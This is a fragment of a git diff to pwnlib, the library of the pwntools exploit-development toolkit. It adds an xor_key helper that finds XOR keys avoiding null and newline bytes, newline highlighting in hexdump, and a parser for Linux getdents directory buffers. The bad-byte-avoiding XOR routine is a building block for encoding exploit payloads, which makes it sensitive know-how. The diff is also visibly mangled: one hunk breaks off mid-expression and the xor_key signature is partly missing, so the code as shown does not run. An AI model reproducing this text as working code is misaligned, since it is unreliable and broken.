been received # It will be pasted together at the end if a diff --git a/pwnlib/util/fiddling.py b/pwnlib/util/fiddling.py index ea4072bf1..2ffd85014 100644 --- a/pwnlib/util/fiddling.py +++ b/pwnlib/util/fiddling.py @@ -7,9 +7,11 @@ from . import lists from . import packing from ..context import context +from ..log import getLogger from ..term import text from .cyclic import cyclic_find +log = getLogger(__name__) def unhex(s): r"""unhex(s) -> str @@ -107,7 +109,8 @@ def bits(s, endian = 'big', zero = 0, one = 1): >>> sum(bits("test")) 17 """ - + if s < 0: + s = s & ((1< None or (int, str) + + Finds a ``size``-width value that can be XORed with a string + to produce ``data``, while neither the XOR value or XOR string + contain any bytes in ``avoid``. + + Arguments: + data (str): The desired string. + avoid: The list of disallowed characters. Defaults to nulls and newlines. + size (int): Size of the desired output value, default is word size. + + Returns: + A tuple containing two strings; the XOR key and the XOR string. + If no such pair exists, None is returned. + + Example: + + >>> xor_key("Hello, world") + ('\x01\x01\x01\x01', 'Idmmn-!vnsme') + """ + size = size or context.bytes + + if len(data) % size: + log.error("Data must be padded to size for xor_key") + + words = lists.group(size, data) + columns = [''] * size + for word in words: + for i,byte in enumerate(word): + columns[i] += byte + + alphabet = list(chr(n) for n in range(256) if chr(n) not in avoid) + + result = '' + + for column in columns: + if context.randomize: + random.shuffle(alphabet) + for c2 in alphabet: + if all(chr(ord(c)^ord(c2)) in alphabet for c in column): + result += c2 + break + else: + return None + + return result, xor(data, result) def randoms(count, alphabet = string.lowercase): """randoms(count, alphabet = string.lowercase) -> str @@ -470,6 +522,7 @@ def _hexiichar(c): 'marker': text.gray if text.has_gray else text.blue, 'nonprintable': text.gray if text.has_gray else text.blue, '00': text.red, + '0a': text.red, 'ff': text.green, } diff --git a/pwnlib/util/getdents.py b/pwnlib/util/getdents.py new file mode 100644 index 000000000..919e315ba --- /dev/null +++ b/pwnlib/util/getdents.py @@ -0,0 +1,57 @@ +from ..context import context +from .packing import unpack +from .fiddling import hexdump +class linux_dirent(object): + def __init__(self, buf): + n = context.bytes + + # Long + self.d_ino = unpack(buf[:n]) + buf=buf[n:] + + # Long + self.d_off = unpack(buf[:n]) + buf=buf[n:] + + # Short + self.d_reclen = unpack(buf[:2], 16) + buf=buf[2:] + + # Name + self.d_name = buf[:buf.index('\x00')] + + def __len__(self): + return self.d_reclen # 2 * context.bytes + 2 + len(self.d_name) + 1 + + def __str__(self): + return "inode=%i %r" % (self.d_ino, self.d_name) + +def dirents(buf): + """unpack_dents(buf) -> list + + Extracts data from a buffer emitted by getdents() + + Arguments: + buf(str): Byte array + + Returns: + A list of filenames. + + Example: + + >>> data = '5ade6d010100000010002e0000000004010000000200000010002e2e006e3d04092b6d010300000010007461736b00045bde6d010400000010006664003b3504' + >>> data = data.decode('hex') + >>> print dirents(data) + ['.', '..', 'fd', 'task'] + """ + d = [] + + while buf: + try: + ent = linux_dirent(buf) + except ValueError: + break + d.append(ent.d_name) + buf = buf[len(ent):] + + return sorted(d)